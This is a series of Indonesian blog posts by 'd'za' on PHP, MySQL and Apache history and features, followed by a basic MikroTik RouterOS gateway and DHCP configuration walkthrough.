- Okt 1999: PHP melampaui FrontPage sebagai modul Apache terpopuler
- Nov 1999: PHP digunakan di 1,1 juta domain dan 357 ribu alamat IP menurut survey Netcraft. Zeev dan ANdi mendirikan Zend Technologies, LTd.
- 20-24 Jan 2000: Konferensi Internasional PHP di TelAviv
- 2 Maret 2000: Zend diluncurkan sebagai portal PHP
- 22 Mei 2000: PHP 4 diluncurkan

PHP menjadi populer karena kesederhanaanya dan kemampuannya dalam menghasilkan berbagai aplikasi web. Mulai dari counter, sistem artikel atau content management system, e-commerce/e-store, bulletin board/forum diskusi, dan sebagainya dapat dibuat dengan PHP.

PHP adalah salah satu bahasa Server-side yang didesain khusus untuk aplikasi web. PHP dapat disisipkan diantara bahasa HTML dan karena bahasa Server side, maka bahasa PHP akan dieksekusi di server, sehingga yang dikirimkan ke browser adalah “hasil jadi” dalam bentuk HTML, dan kode PHP anda tidak akan terlihat.
PHP termasuk dalam Open Source Product dan saat ini telah mencapai versi 4. Jadi anda dapat merubah source code dan mendistribusikannya secara bebas. PHP juga diedarkan secara gratis. Anda bisa mendapatkannya secara gratis. PHP juga dapat berjalan diberbagai web server semisal IIS, Apache. PWS, dll.

Penggabungan PHP dengan HTML

Seperti yang telah dituliskan sebelumnya bahwa PHP dapat digabung / mixed dengan HTML, Untuk penulisannya dalam HTML, kode PHP diawali dengan tanda .
Testing
Testing


Kelebihan PHP:

- Aplikasi dengan PHP cukup cepat dibandingkan dengan aplikasi CGI dengan Perl atau Phyton bahkan lebih cepat dibanding dengan ASP maupun Java dalam berbagai aplikasi web (Kecepatan ini bisa bervariasi karena dipengaruhi oleh tipe aplikasi dan jumlah pengunjung).
- Tersedia baik di Windows maupun Linux, walau saat ini paling efektif di web server Apache dan OS Linux
- Sintaks mirip C dan mudah dipelajari
- Komunitas yang ramai dan saling membantu, seperti di diskusiweb.com, phpbuilder.com, phpindo.com, serta berbagai situs dan mailing list lain.
- Berbagai skrip atau aplikasi siap pakai yang gratis telah tersedia

Kelemahan PHP:

- Tidak ideal untuk pengembangan skala besar
- Tidak memiliki sistem pemrograman berorientasi objek yang sesungguhnya (sampai versi 4 ini)
- Tidak bisa memisahkan antara tampilan dengan logik dengan baik (walau penggunaan template dapat memperbaikinya)
- PHP memiliki kelemahan security tertentu apabila programmer tidak jeli dalam melakukan pemrograman dan kurang memperhatikan isu dan konfigurasi PHP
- Kode PHP dapat dibaca semua orang, dan kompilasi hanya dapat dilakukan dengan tool yang mahal dari Zend ($2000).
Created by d'za
Read More...

MySQL dikembangkan oleh sebuah perusahaan Swedia bernama MySQL AB, yang kala itu bernama TcX DataKonsult AB, sejak sekitar 1994–1995, meski cikal bakal kodenya bisa disebut sudah ada sejak 1979. Tujuan mula-mula TcX membuat MySQL pada waktu itu juga memang untuk mengembangkan aplikasi Web untuk klien—TcX adalah perusahaan pengembang software dan konsultan database. Kala itu Michael Widenius, atau “Monty”, pengembang satu-satunya di TcX, memiliki aplikasi UNIREG dan rutin ISAM yang dibuat sendiri dan sedang mencari antarmuka SQL untuk ditempelkan di atasnya. Mula-mula TcX memakai mSQL, atau “mini SQL” (akan kita kunjungi nanti). Barangkali mSQL adalah satu-satunya kode database open source yang tersedia dan cukup sederhana saat itu, meskipun sudah ada Postgres (juga akan dibahas sesaat lagi). Namun ternyata, menurut Monty
MySQL tidaklah cukup cepat maupun fleksibel. Versi pertama mSQL bahkan tidak memiliki indeks. Setelah mencoba menghubungi David Hughes—pembuat mSQL—dan ternyata mengetahui bahwa David tengah sibuk mengembangkan versi dua, maka keputusan yang diambil Monty yaitu membuat sendiri mesin SQL yang antarmukanya mirip dengan mSQL tapi memiliki kemampuan yang lebih sesuai kebutuhan. Lahirlah MySQL. Nama MySQL (baca: mai és kju él) tidak jelas diambil dari mana. Ada yang bilang ini diambil dari huruf pertama dan terakhir nama panggilan Michael Widenius, Monty. Ada lagi yang bilang kata My diambil dari nama putri Monty, yang memang diberi nama My—karena Monty memang aslinya seorang Finlandia. Tapi sebetulnya kalau source code MySQL dilirik, prefiks my memang sudah terbubuhi di mana-mana—prefiks ini sering menjadi prefiks umum kalau seseorang membuat kode kustom tersendiri untuk sesuatu. Kalau Anda betul-betul penasaran mana yang benar, mungkin bisa bertanya langsung kepada Monty.

MySQL versi 1.0 dirilis Mei 1996 secara terbatas kepada empat orang. Baru di bulan Oktober versi 3.11.0 dilepas ke publik. Namun mula-mula kode ini tidak diberikan di bawah lisensi General Public License, melainkan lisensi khusus yang intinya kurang lebih begini: “Source code MySQL dapat dilihat dan gratis, serta server MySQL dapat dipakai tanpa biaya tapi hanya untuk kebutuhan nonkomersial. Untuk kebutuhan komersial (mis: mengemas dan menjual MySQL, atau menyertakan MySQL dalam program komersial lain) Anda harus bayar lisensi.” Sementara distribusi Windows MySQL sendiri dirilis secara shareware. Barulah pada Juni 2000 MySQL AB mengumumkan bahwa sejak versi 3.23.19, MySQL adalah software bebas berlisensi GPL. Artinya, “Source code MySQL dapat dilihat dan gratis, serta server MySQL dapat dipakai tanpa biaya untuk kebutuhan apa pun. Tapi jika Anda memodifikasi source code, Anda juga harus melepasnya di bawah lisensi yang sama, yaitu GPL.” Kini perusahaan MySQL AB, yang beranggotakan sekitar 10 programer dan 10 karyawan lain itu, memperoleh pemasukan terutama dari jasa konsultasi seputar MySQL.

Versi publik pertama, yang hanya berjalan di Linux dan Solaris serta sebagian besar masih belum terdokumentasi itu, dengan berangsur-angsur diperbaiki dan ditambah fitur demi fiturnya—tapi tetap dengan fokus utama pengembangan pada kelangsingan dan kecepatan. Artinya, fitur yang menyebabkan MySQL menjadi lambat tidaklah ditambahkan, atau ditunda dulu, atau ditambahkan tapi menjadi fitur yang opsional.

Versi awal MySQL ini, meski sudah bisa dipakai untuk aplikasi Web sederhana, belumlah memadai sama sekali untuk aplikasi bisnis. Contohnya, JOIN sederhana sudah ada, tapi tidak ada HAVING—baru di bulan Desember ditambahkan. Sudah ada tipe data TIMESTAMP dan kolom autoupdate, tapi tidak ada system-generated number (sequence)—baru di akhir 1996 juga ditambahkan modifier kolom AUTO_INCREMENT. Sudah ada LIMIT tapi GROUP BY dan ORDER BY memiliki keterbatasan. Dan seterusnya.

Barulah di versi-versi akhir 3.22—sepanjang 1998–1999—MySQL menjadi semakin popular dan dilirik orang. Stabilitasnya sudah baik. Kecepatannya meningkat. Sudah tersedia di berbagai platform, termasuk Windows. Seri 3.22 ini banyak dipakai di berbagai instalasi, mungkin hingga sekarang, sehingga MySQL AB tetap memberikan dukungan technical support untuk seri ini.
Setelah itu, pada bula Agustus 2002, Muncullah MySQL versi 4.0 beta yang dirilis pada bulan Maret 2003, lalu versi 4.0 beta dikembangkan menjadi versi 4.1 beta yang dirilis pada bulan juni 2004. Kemudian pada bulan maret 2005 muncullah MySQL versi 5.0 yang akhirnya diperbarui menjadi MySQL versi 5.1 yang dirilis pada 27 November 2008 lalu..


Creataed by d'za
Read More...

Oke, Setelah artikel saya yang sebelumnya menjelaskan tentang Apache Web Server, kali mini saya akan menjelaskan kembali tentang salah satu software atau aplikasi yang berhubungan dengan web server, aplikasi  atau software itu adalah MySQL. MySQL adalah suatu perangkat lunak database relasi (Relational Database Management System atau RDBMS), seperti halnya ORACLE, Postgresql, MS SQL, dan sebagainya. MySQL AB menyebut produknya sebagai database open source terpopuler di dunia. Berdasarkan riset dinyatakan bahwa bahwa di platform Web, dan baik untuk kategori open source maupun umum, MySQL adalah database yang paling banyak dipakai. Menurut perusahaan pengembangnya, MySQL telah terpasang di sekitar 3 juta komputer. Puluhan hingga ratusan ribu situs mengandalkan MySQL bekerja siang malam memompa data bagi para pengunjungnya.

Fitur MySQL
Adapun fitur-fitur yang diberikan oleh aplikasi MySQL, diantaranya adalah :

-> Kalau di seri 3.22 MySQL mulai diadopsi banyak orang dan meningkat populasi penggunanya, maka di seri 3.23 dan 4.0-lah terjadi banyak peningkatan dari sisi teknologi. Ini tidak terlepas dari tuntutan pemakai yang semakin mengandalkan MySQL, namun membutuhkan fitur-fitur yang lebih banyak lagi.

-> Seri 3.23. Di seri 3.23 MySQL menambahkan tiga jenis tabel baru: pertama MyISAM, yang sampai sekarang menjadi tipe tabel default; kedua BerkeleyDB, yang pertama kali menambahkan kemampuan transaksi pada MySQL; dan ketiga InnoDB, primadona baru yang potensial.


-> Seri 4.x. Di seri yang baru berjalan hingga 4.0 tahap alfa ini, pengembang MySQL berjanji akan menjadikan MySQL satu derajat lebih tinggi lagi. Fitur-fitur yang sejak dulu diminta akan dikabulkan, seperti subselek (di 4.1), union (4.0), foreign key constraint (4.0 atau 4.1—meski InnoDB sudah menyediakan ini di 3.23.x), stored procedure (4.1), view (4.2), cursor (4.1 atau 4.2), trigger (4.1). MySQL AB tetap berdedikasi mengembangkan dan memperbaiki MySQL, serta mempertahankan MySQL sebagai database open source terpopuler.

Keunggulan MySQL

Selain itu, MySQL juga banyak memberikan keunggulan-keunggulan jika dibandingkan dengan software database lainya, diantara beberapa keunggulan MySQL yaitu :

Penyebab utama MySQL begitu popular di kalangan Web adalah karena ia memang cocok bekerja di lingkungan tersebut. Pertama, MySQL tersedia di berbagai platform Linux dan berbagai varian Unix. Sesuatu yang tidak dimiliki Access, misalnya—padahal Access amat popular di platform Windows. Banyak server Web berbasiskan Unix, ini menjadikan Access otomatis tidak dapat dipakai karena ia pun tidak memiliki kemampuan client-server/networking.

Kedua, fitur-fitur yang dimiliki MySQL memang yang biasanya banyak dibutuhkan dalam aplikasi Web. Misalnya, klausa LIMIT SQL-nya, praktis untuk melakukan paging. Atau jenis indeks field FULLTEXT, untuk full text searching. Atau sebutlah kekayaaan fungsi-fungsi builtinnya, mulai dari memformat dan memanipulasi tanggal, mengolah string, regex, enkripsi dan hashing. Yang terakhir misalnya, praktis untuk melakukan penyimpanan password anggota situs.

Ketiga, MySQL memiliki overhead koneksi yang rendah. Soal kecepatan melakukan transaksi atau kinerja di kondisi load tinggi mungkin bisa diperdebatkan dengan berbagai benchmark berbeda, tapi kalau soal yang satu ini MySQL-lah juaranya. Karakteristik ini membuat MySQL cocok bekerja dengan aplikasi CGI, di mana di setiap request skrip akan melakukan koneksi, mengirimkan satu atau lebih perintah SQL, lalu memutuskan koneksi lagi. Cobalah melakukan hal ini dengan Interbase atau bahkan Oracle. Maka dengan load beberapa request per detik saja server Web/database Anda mungkin akan segera menyerah karena tidak bisa mengimbangi beban ini.

Created by d'za
Read More...

Apache ini dibuat versi pertamanya oleh Robert Mc Cool — yang terlibat di NCSA– padatahun 1996. Ditulis dalam bahasa C, perkembangannya dilakukan bersama rekan-rekan melalui email. Dia mengerjakan proyek itu bersama Apache groupnya : Brian Behlendorf, Roy T. Fielding, Rob Hartill, David Robinson, Cliff Skolnick, Randy Terbush, Robert S. Thau, Andrew Wilson, Eric Hagberg, Frank Peters and Nicolas Pioch.
Kenapa diberi nama Apache? Kata yang mendirikan karena pertama mereka ingin menghargai penduduk asli Amerika Indian Apache yang dikenal ketahanan dan skilnya saat perang, dan kedua karena akar proyek si apche ini merupakan sebuah ‘a patchy server’. Alasan kedua sebenarnya dengan hoki ditemukan. Apache dikembangkan oleh komunitas terbuka yang di bawahi oleh Apache Software Foundation. Aplikasinya dapat digunakan untuk OS yang beragam( tidak bergantung pada vendor tertentu (cross platform)), sebut saja UNIX, FreeBSD, Linux, Novell netware, MacOS X, Windows.
Kelebihan dan kekurangan Apache

Web server Apache mempunyai kelebihan dari beberapa pertimbangan di atas :

1. Apache termasuk dalam kategori freeware.
2. Apache mudah sekali proses instalasinya jika dibanding web server lainnya seperti NCSA, IIS, dan lain-lain.
3. Mampu beroperasi pada berbagai paltform sistem operasi.
4. Mudah mengatur konfigurasinya. Apache mempunyai hanya empat file konfigurasi.
5. Mudah dalam menambahkan peripheral lainnya ke dalam platform web servernya.

Fasilitas atau ciri khas dari web server Apache adalah :

1. Dapat dijadikan pengganti bagi NCSA web server.
2. Perbaikan terhadap kerusakan dan error pada NCSA 1.3 dan 1.4.
3. Apache merespon web client sangat cepat jauh melebihi NCSA.
4. Mampu di kopilasi sesuai dengan spesifikasi HTTP yang sekarang.
5. Apache menyediakan feature untuk multihomed dan virtual server.
6. Kita dapat menetapkan respon error yang akan dikirim web server dengan menggunkan file atau skrip.
7. Server apache dapat otomatis berkomunikasi dengan client browsernya untuk menampilkan tampilan terbaik pada client browsernya. Misalnya, browser ingin menampilkan dalam bahasa spanyol, maka web server apache otomatis mencari dalam servicenya halaman-halaman dengan bahasa spanyol.
8. Web server Apache secara otomatis menjalankan file index.html, halaman utamanya, untuk ditampilkan secara otomatis pada clientnya.
9. Web server Apache mempunyai level-level pengamanan.
10. Apache mempunyai komponen dasar terbanyak di antara web server lain.
11. Ditinjau dari segi sejarah perkembangan dan prospeknya, Apache web server mempunyai prospek yang cerah. Apache berasal dari web server NCSA yang kemudian dikembangkan karena NCSA masih mempunyai kekurangan di bidang kompatibilitasnya dengan sistim operasi lain. Sampai saat ini, web server Apache terus dikembangkan oleh tim dari apache.org.
12. Performasi dan konsumsi sumber daya dari web server Apache tidak terlalu banyak, hanya sekitar 20 MB untuk file-file dasarnya dan setiap daemonnya hanya memerlukan sekitar 950 KB memory per child.

13. Mendukung transaksi yang aman (secure transaction) menggunakan SSL (secure socket layer).
14. Mempunyai dukungan teknis melalui web.
15. mempunyai kompatibilitas platform yang tinggi.
16.mendukung third party berupa modul-modul tambahan.

Kekuranga Apache :

Setelah anda mengetahui beberapa kelebihan dari Apache, maka kali ini saya akan menjelaskan tentang beberapa kekurangan dari Apache, beberapa kekurangan dari Apache adalah :

1. web server Apache tidak memiliki kemampuan mengatur load seperti IIS, sehingga akan terus mem-fork proses baru hingga nilai MaxClients tercapai atau hingga batas yang diizinkan oleh OS. Ini tentunya menguntungkan penyerang karena habisnya RAM akan lebih cepat tercapai.

2. Apache tidak memproses karakter kutip dalam string Referrer dan User-Agent yang dikirimkan oleh Client. Ini berarti Client dapat memformulasi inputnya secara hati-hati untuk merusak format baris log akses
.
3. Terganggunya proses upload data, yang bisa menyebabkan software salah dalam menerjemahkan ukuran data yang masuk. Dengan celah tersebut, hacker dikabarkan dapat mengeksploitasi kerentanan dengan cara mengirimkan request pada server Apache bersangkutan. Versi yang cacat tersebut adalah seluruh generasi Apache 1.3 dan versi 2 hingga 2.0.36. Server yang diserang hacker memanfaatkan kelemahan ini akan mengalami DoS, alias server itu tak bisa diakses. Dalam sejumlah kasus, penyerangnya dapat menjalankan pilihan kodenya.
Created by d'za
Read More...

Sebelum membuat web server, kali ini saya akan menjelaskan apa yang dimaksud dengan web server. Secara singkat web server adalah sebuah aplikasi yang memberikan layanan web, sedangkan pengertian dari web server sebenarnya adalah Program komputer yang bertanggung jawab menerima request HTTPdari clients, yang dikenal sebagai web browser, dan melayani mereka, dan bersedia merespon data konten yang diminta seperti web pages(dalam bentuk HTML atau objek seperti jpg, dan kawan kawan). Web server menggunakan protokol yang disebut dengan HTTP (Hypert Text Transfer Protocol). Dengan ini anda mempunyai banyak pilihan di dunia open source, tentu saja semuanya itu tergantung pada keperluan anda sendiri. Kali ini saya akan menjelaskan tentang salah satu web server yang sangat terkenal dan menjadi standart de facto setiap distribusi linux, yaitu Apache.
Apache adalah sebuah nama web server yang bertanggung jawab pada request-response HTTP dan logging informasi secara detail(kegunaan basicnya). Selain itu, Apache juga diartikan sebagai suatu web server yang kompak, modular, mengikuti standar protokol HTTP, dan tentu saja sangat digemari. Kesimpulan ini bisa didapatkan dari jumlah pengguna yang jauh melebihi para pesaingnya. Sesuai hasil survai yang dilakukan oleh Netcraft, bulan Januari 2005 saja jumlahnya tidak kurang dari 68% pangsa web server yang berjalan di Internet. Ini berarti jika semua web server selain Apache digabung, masih belum bisa mengalahkan jumlah Apache. 

Saat ini ada dua versi Apache yang bisa dipakai untuk server produksi, yaitu versi mayor 2.0 dan versi mayor 1.3. Apache merupakan webserver yang paling banyak digunakan saat ini. Hal ini disebabkan oleh beberapa sebab, di antaranya adalah karena sifatnya yang opensource dan mudahnya mengkostumisasikannya. diantaranya dengan menambahkan support secure protocol melalui ssl dan konektifitasnya dengan database server melalui bahasa scripting PHP .


Created by d'za
Read More...

MikroTik RouterOS™ adalah sistem operasi linux yang dapat digunakan untuk menjadikan komputer menjadi router network yang handal, mencakup berbagai fitur yang dibuat untuk ip network dan jaringan wireless, cocok digunakan oleh ISP dan provider hostspot.
Ada pun fitur2 nya sbb:
* Firewall and NAT - stateful packet filtering; Peer-to-Peer protocol filtering; source and destination NAT; classification by source MAC, IP addresses (networks or a list of networks) and address types, port range, IP protocols, protocol options (ICMP type, TCP flags and MSS), interfaces, internal packet and connection marks, ToS (DSCP) byte, content, matching sequence/frequency, packet size, time and more... * Routing - Static routing; Equal cost multi-path routing; Policy based routing (classification done in firewall); RIP v1 / v2, OSPF v2, BGP v4
* Data Rate Management - Hierarchical HTB QoS system with bursts; per IP / protocol / subnet / port / firewall mark; PCQ, RED, SFQ, FIFO queue; CIR, MIR, contention ratios, dynamic client rate equalizing (PCQ), bursts, Peer-to-Peer protocol limitation
* HotSpot - HotSpot Gateway with RADIUS authentication and accounting; true Plug-and-Play access for network users; data rate limitation; differentiated firewall; traffic quota; real-time status information; walled-garden; customized HTML login pages; iPass support; SSL secure authentication; advertisement support
* Point-to-Point tunneling protocols - PPTP, PPPoE and L2TP Access Concentrators and clients; PAP, CHAP, MSCHAPv1 and MSCHAPv2 authentication protocols; RADIUS authentication and accounting; MPPE encryption; compression for PPPoE; data rate limitation; differentiated firewall; PPPoE dial on demand
* Simple tunnels - IPIP tunnels, EoIP (Ethernet over IP)
* IPsec - IP security AH and ESP protocols; MODP Diffie-Hellman groups 1,2,5; MD5 and SHA1 hashing algorithms; DES, 3DES, AES-128, AES-192, AES-256 encryption algorithms; Perfect Forwarding Secrecy (PFS) MODP groups 1,2,5

* Proxy - FTP and HTTP caching proxy server; HTTPS proxy; transparent DNS and HTTP proxying; SOCKS protocol support; DNS static entries; support for caching on a separate drive; access control lists; caching lists; parent proxy support

* DHCP - DHCP server per interface; DHCP relay; DHCP client; multiple DHCP networks; static and dynamic DHCP leases; RADIUS support

* VRRP - VRRP protocol for high availability

* UPnP - Universal Plug-and-Play support

* NTP - Network Time Protocol server and client; synchronization with GPS system
* Monitoring/Accounting - IP traffic accounting, firewall actions logging, statistics graphs accessible via HTTP

* SNMP - read-only access

* M3P - MikroTik Packet Packer Protocol for Wireless links and Ethernet

* MNDP - MikroTik Neighbor Discovery Protocol; also supports Cisco Discovery Protocol (CDP)

* Tools - ping; traceroute; bandwidth test; ping flood; telnet; SSH; packet sniffer; Dynamic DNS update tool
* Wireless - IEEE802.11a/b/g wireless client and access point (AP) modes; Nstreme and Nstreme2 proprietary protocols; Wireless Distribution System (WDS) support; virtual AP; 40 and 104 bit WEP; WPA pre-shared key authentication; access control list; authentication with RADIUS server; roaming (for wireless client); AP bridging

* Bridge - spanning tree protocol; multiple bridge interfaces; bridge firewalling, MAC
* VLAN - IEEE802.1q Virtual LAN support on Ethernet and wireless links; multiple VLANs; VLAN bridging

* ISDN - ISDN dial-in / dial-out; PAP, CHAP, MSCHAPv1 and MSCHAPv2 authentication protocols; RADIUS authentication and accounting; 128K bundle support; Cisco HDLC, x75i, x75ui, x75bui line protocols; dial on demand

* SDSL - Single-line DSL support; line termination and network termination modes


Instalasi dapat dilakukan pada Standard computer PC. PC yang akan dijadikan router mikrotikpun tidak memerlukan resource yang cukup besar untuk penggunaan standard, misalnya hanya sebagai gateway.

berikut spec minimal nya :

* CPU and motherboard - bisa pake P1 ampe P4, AMD, cyrix asal yang bukan multi-prosesor

* RAM - minimum 32 MiB, maximum 1 GiB; 64 MiB atau lebih sangat dianjurkan, kalau mau sekalian dibuat proxy , dianjurkan 1GB... perbandingannya, 15MB di memori ada 1GB di proxy..

* HDD minimal 128MB parallel ATA atau Compact Flash, tidak dianjurkan menggunakan UFD, SCSI, apa lagi S-ATA Very Happy

*NIC 10/100 atau 100/1000

Untuk keperluan beban yang besar ( network yang kompleks, routing yang rumit dll) disarankan untuk mempertimbangkan pemilihan resource PC yang memadai. Lebih lengkap bisa dilihat di www.mikrotik.com. Meskipun demikian Mikrotik bukanlah free software, artinya kita harus membeli licensi terhadap segala fasiltas yang disediakan. Free trial hanya untuk 24 jam saja. Kita bisa membeli software mikrotik dalam bentuk CD yang diinstall pada Hard disk atau disk on module (DOM). Jika kita membeli DOM tidak perlu install tetapi tinggal menancapkan DOM pada slot IDE PC kita.

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.

1. Langkah pertama adalah install Mikrotik RouterOS pada PC atau pasang DOM.

2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)
Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.

3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]]

4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “d1z4” (nama ini sih bebas2 aja mo diganti)
[admin@Mikrotik] > system identity set name=d1z4
[admin@d1z4]

5. Melihat interface pada Mikrotik Router
[admin@d1z4] > interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@d1z4]

6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 172.16.0.1

[admin@d1z4] ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@d1z4] ip address add address=172.16.0.1
netmask=255.255.255.0 interface=ether2

7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@d1z4] ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 172.16.0.1/24 172.16.0.0 172.16.0.255 ether2
[admin@d1z4]

8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.0.254 [admin@d1z4] /ip route add gateway=192.168.0.254

9. Melihat Tabel routing pada Mikrotik Routers
[admin@d1z4] ip route print
Flags: X - disabled, A - active, D - dynamic,
C - connect, S - static, r - rip, b - bgp, o - ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 172.16.0.0/24 172.16.0.1 ether2
1 ADC 192.168.0.0/26 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.0.254 ether1
[admin@d1z4]

10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@d1z4] ping 192.168.0.254
192.168.0.254 64 byte ping: ttl=64 time<1 ms 192.168.0.254 64 byte ping: ttl=64 time<1 ms 2 packets transmitted, 2 packets received, 0% packet loss round-trip min/avg/max = 0/0.0/0 ms 
[admin@d1z4] >

11. Setup DNS pada Mikrotik Routers
[admin@d1z4] ip dns set primary-dns=192.168.0.10 allow-remoterequests=no
[admin@d1z4] ip dns set secondary-dns=192.168.0.11 allow-remoterequests=no

12. Melihat konfigurasi DNS
[admin@d1z4] ip dns print
primary-dns: 192.168.0.10
secondary-dns: 192.168.0.11
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@d1z4]

13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@d1z4] ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@d1z4]

Jika sudah berhasil reply berarti seting DNS sudah benar.

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server. Setelah terkoneksi dengan jaringan Mikrotik dapat dimanage menggunakan WinBox yang bisa di download dari Mikrotik.com atau dari server mikrotik kita.

Misal Ip address server mikrotik kita 192.168.0.1, via browser buka http://192.168.0.1 dan download WinBox dari situ. Jika kita menginginkan client mendapatkan IP address secara otomatis maka perlu kita setup dhcp server pada Mikrotik. Berikut langkah-langkahnya :

1.Buat IP address pool
/ip pool add name=dhcp-pool ranges=172.16.0.10-172.16.0.20

2. Tambahkan DHCP Network dan gatewaynya yang akan didistribusikan ke client Pada contoh ini networknya adalah 172.16.0.0/24 dan gatewaynya 172.16.0.1
/ip dhcp-server network add address=172.16.0.0/24 gateway=172.16.0.1

3. Tambahkan DHCP Server ( pada contoh ini dhcp diterapkan pada interface ether2 )
/ip dhcp-server add interface=ether2 address-pool=dhcp-pool

4. Lihat status DHCP server
[admin@d1z4] ip dhcp-server print
Flags: X - disabled, I - invalid
# NAME INTERFACE RELAY ADDRESS-POOL LEASE-TIME ADD-ARP
0 X dhcp1 ether2
Tanda X menyatakan bahwa DHCP server belum enable maka perlu dienablekan terlebih dahulu pada langkah 5.

5. Jangan Lupa dibuat enable dulu dhcp servernya
/ip dhcp-server enable 0

kemudian cek kembali dhcp-server seperti langkah 4, jika tanda X sudah tidak ada berarti sudah aktif.

6. Tes Dari client
ping www.yahoo.com

Selamat Mencoba..


Created by d'za
Read More...